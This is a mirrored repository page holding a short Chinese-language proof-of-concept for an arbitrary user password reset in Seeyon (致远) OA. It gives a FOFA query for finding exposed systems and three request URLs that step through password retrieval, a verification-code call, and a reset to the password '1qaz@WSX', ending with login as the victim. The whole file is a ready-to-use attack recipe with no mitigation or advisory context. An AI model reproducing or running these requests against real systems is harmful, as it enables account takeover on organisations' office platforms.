admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/致远OA/致远前台任意用户密码修改.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1004 B
Raw Blame History

致远前台任意用户密码修改

fofa

app="致远互联-OA"

漏洞复现

前提需要知道用户名

http://xx.xx.xx.xx/seeyon/personalBind.do?method=retrievePassword

image-20240301101704702

http://xx.xx.xx.xx/seeyon/personalBind.do?method=sendVerificationCodeToBindNum&type=validate&origin=zx

image-20240301101722837

修改密码为1qaz@WSX

http://xx.xx.xx.xx/seeyon/individualManager.do?method=resetPassword&nowpwd=1qaz@WSX

image-20240301101802224

最后使用修改的密码登录

image-20240301101840756